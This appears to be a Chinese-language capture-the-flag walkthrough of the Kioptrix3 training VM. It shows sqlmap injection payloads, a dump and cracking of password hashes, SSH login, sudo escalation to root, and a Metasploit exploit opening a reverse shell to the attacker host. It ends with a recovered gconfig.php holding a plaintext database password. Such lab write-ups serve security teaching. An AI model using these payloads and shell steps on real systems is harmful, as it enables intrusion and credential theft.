# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com
在 Linux 下对应的文件是 /etc/hosts。本关涉及一个 Web 应用，其页面链接和资源都按域名 kioptrix3.com 引用（见后文 gconfig.php 中的 gallarific_path = http://kioptrix3.com/gallery），所以要让站点正常显示就必须加上这条解析。注意把 IP 改成你自己环境里靶机的实际地址：本文 nmap 发现的靶机是 192.168.84.144，而不是模板里的 192.168.1.102。希望你喜欢 Kioptrix VM Level 1.2 挑战。Have fun
漏洞:
文件包含
访问控制不当
重用凭证
SQL注入
不受限制地上传危险类型的文件
凭证不足
信息收集
先用 nmap 做主机发现，定位靶机 IP（-sn 只做 ping 扫描，不探测端口）：
root@kali:~# nmap -sn -v 192.168.84.0/24 Nmap scan report for 192.168.84.144 Host is up (0.00023s latency). MAC Address: 00:0C:29:44:36:85 (VMware)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:14:33 /2019-12-13/ [04:14:33] [INFO] parsing HTTP request from 'sqlmap.txt' [04:14:33] [INFO] resuming back-end DBMS 'mysql' [04:14:33] [INFO] testing connection to the target URL [04:14:33] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE (SELECT 1341 UNION SELECT 9380) END))&sort=photoid Type: error-based Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) Payload: id=1 OR ROW(1324,2762)>(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1324=1324,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM (SELECT 8520 UNION SELECT 1582 UNION SELECT 8916 UNION SELECT 1258)a GROUP BY x)&sort=photoid Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 4741 FROM (SELECT(SLEEP(5)))vtbf)&sort=photoid Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT CONCAT(0x7171766a71,0x4d67454a425a6e796b5745656b794f584a4348714c79624d4255416243444967494975507875524d,0x7170786a71),NULL,NULL,NULL,NULL,NULL-- TpfQ&sort=photoid Parameter: sort (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1&sort=photoid AND (SELECT 4185 FROM (SELECT(SLEEP(5)))Gmzf) --- there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: id, type: Unescaped numeric (default) [1] place: GET, parameter: 
sort, type: Unescaped numeric [q] Quit [04:14:34] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [04:14:34] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times [04:14:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] ending @ 04:14:34 /2019-12-13/
root@kali:~# sqlmap -r sqlmap.txt -D gallery -T dev_accounts --dump ___ __H__ ___ ___[)]_____ ___ ___ {1.3.12#stable} |_ -| . ["] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:18:17 /2019-12-13/ [04:18:17] [INFO] parsing HTTP request from 'sqlmap.txt' [04:18:17] [INFO] resuming back-end DBMS 'mysql' [04:18:17] [INFO] testing connection to the target URL [04:18:18] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE (SELECT 1341 UNION SELECT 9380) END))&sort=photoid Type: error-based Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) Payload: id=1 OR ROW(1324,2762)>(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1324=1324,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM (SELECT 8520 UNION SELECT 1582 UNION SELECT 8916 UNION SELECT 1258)a GROUP BY x)&sort=photoid Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 4741 FROM (SELECT(SLEEP(5)))vtbf)&sort=photoid Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT CONCAT(0x7171766a71,0x4d67454a425a6e796b5745656b794f584a4348714c79624d4255416243444967494975507875524d,0x7170786a71),NULL,NULL,NULL,NULL,NULL-- TpfQ&sort=photoid Parameter: sort (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1&sort=photoid AND (SELECT 4185 FROM 
(SELECT(SLEEP(5)))Gmzf) --- there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: id, type: Unescaped numeric (default) [1] place: GET, parameter: sort, type: Unescaped numeric [q] Quit [04:18:18] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [04:18:18] [INFO] fetching columns for table 'dev_accounts' in database 'gallery' [04:18:18] [INFO] used SQL query returns 3 entries [04:18:19] [INFO] used SQL query returns 3 entries [04:18:19] [INFO] retrieved: 'id' [04:18:19] [INFO] retrieved: 'int(10)' [04:18:19] [INFO] retrieved: 'username' [04:18:19] [INFO] retrieved: 'varchar(50)' [04:18:19] [INFO] retrieved: 'password' [04:18:19] [INFO] retrieved: 'varchar(50)' [04:18:19] [INFO] fetching entries for table 'dev_accounts' in database 'gallery' [04:18:19] [INFO] used SQL query returns 2 entries [04:18:19] [INFO] retrieved: '1','0d3eccfb887aabd50f243b3f155c0f85','dreg' [04:18:19] [WARNING] automatically patching output having last char trimmed [04:18:19] [INFO] retrieved: '2','5badcaf789d3d1d09794d8f021f40f0e','loneferret' [04:18:19] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y [04:18:22] [INFO] writing hashes to a temporary file '/tmp/sqlmapa2cskfzq12456/sqlmaphashes-0oyz7rlz.txt' do you want to crack them via a dictionary-based attack? [Y/n/q] y [04:18:28] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [04:18:31] [INFO] using default dictionary do you want to use common password suffixes? (slow!) 
[y/N] y [04:18:34] [INFO] starting dictionary-based cracking (md5_generic_passwd) [04:18:34] [INFO] starting 4 processes [04:18:39] [INFO] cracked password 'starwars' for user 'loneferret' [04:18:40] [INFO] cracked password 'Mast3r' for user 'dreg' Database: gallery Table: dev_accounts [2 entries] +----+---------------------------------------------+------------+ | id | password | username | +----+---------------------------------------------+------------+ | 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg | | 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret | +----+---------------------------------------------+------------+ [04:18:42] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv' [04:18:42] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times [04:18:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] ending @ 04:18:42 /2019-12-13/
root@kali:~# ssh loneferret@192.168.84.144 loneferret@192.168.84.144's password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106 loneferret@Kioptrix3:~$ ls checksec.sh CompanyPolicy.README loneferret@Kioptrix3:~$ id uid=1000(loneferret) gid=100(users) groups=100(users) loneferret@Kioptrix3:~$ pwd /home/loneferret loneferret@Kioptrix3:~$ whoami loneferret loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo /bin/sh # whoami root # id uid=0(root) gid=0(root) groups=0(root) # pwd /home/loneferret # cd /root # cat Congrats.txt Good for you for getting here. Regardless of the matter (staying within the spirit of the game of course) you got here, congratulations are in order. Wasn't that bad now was it. Went in a different direction with this VM. Exploit based challenges are nice. Helps workout that information gathering part, but sometimes we need to get our hands dirty in other things as well. Again, these VMs are beginner and not intented for everyone. Difficulty is relative, keep that in mind. The object is to learn, do some research and have a little (legal) fun in the process. I hope you enjoyed this third challenge. Steven McElrea aka loneferret http://www.kioptrix.com Credit needs to be given to the creators of the gallery webapp and CMS used for the building of the Kioptrix VM3 site. Main page CMS: http://www.lotuscms.org Gallery application: Gallarific 2.1 - Free Version released October 10, 2009 http://www.gallarific.com Vulnerable version of this application can be downloaded from the Exploit-DB website: http://www.exploit-db.com/exploits/15891/ The HT Editor can be found here: http://hte.sourceforge.net/downloads.html And the vulnerable version on Exploit-DB here: http://www.exploit-db.com/exploits/17083/ Also, all pictures were taken from Google Images, so being part of the public domain I used them.
msf5 > use exploit/multi/http/lcms_php_exec msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.84.144 RHOSTS => 192.168.84.144 msf5 exploit(multi/http/lcms_php_exec) > set payload generic/shell_reverse_tcp payload => generic/shell_reverse_tcp msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.84.135 LHOST => 192.168.84.135 msf5 exploit(multi/http/lcms_php_exec) > set URI / URI => /
msf5 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 192.168.84.135:4444 [*] Using found page param: /index.php?page=index [*] Sending exploit ... [*] Command shell session 2 opened (192.168.84.135:4444 -> 192.168.84.144:57666) at 2019-12-14 06:18:03 -0500
cat gallery/gconfig.php
<?php
// Gallarific configuration file as recovered from the target's web root.
// NOTE(review): the file lives beside the application code, so anything that
// can read the web root (the LFI / web shell used above) obtains the database
// credentials in clear text.
error_reporting(0); // NOTE(review): silences every PHP diagnostic; together with the @ below, failures only surface via the echo()s
/* A sample Gallarific configuration file.
   You should edit the installer details below and save this file as gconfig.php
   Do not modify anything else if you don't know what it is. */

// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery"; // absolute URL: this is why kioptrix3.com must resolve in /etc/hosts
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
// NOTE(review): the application connects as the MySQL root account, so the SQL
// injection in the gallery's id/sort parameters (shown earlier) runs with
// whatever privileges root holds — presumably full access to every database,
// which is how gallery.dev_accounts could be dumped.
$GLOBALS["gallarific_mysql_username"] = "root";
// NOTE(review): hard-coded plaintext password; should be kept outside the web root.
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

// Setting Details -------------------------------------------------
// Connect with the legacy mysql_* extension; @ suppresses the connect warning.
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
    // mysql_error() text is echoed to the client — leaks server details on failure.
    echo("A connection to the database couldn't be established: " . mysql_error());
    die();
} else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
        die();
    } else {
        // Load every row of gallarific_settings into $GLOBALS.
        // $settings is not checked for a false return before mysql_num_rows();
        // with error_reporting(0) a failed query just fails silently here.
        $settings=mysql_query("select * from gallarific_settings");
        if(mysql_num_rows($settings)!=0){
            while($data=mysql_fetch_array($settings)){
                // NOTE(review): the row's settings_name becomes the global's NAME,
                // so any row in this table can define or overwrite an arbitrary
                // global (including the connection settings above). If the SQL
                // injection shown earlier permits writes, it reaches these globals.
                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
            }
        }
    }
}
?>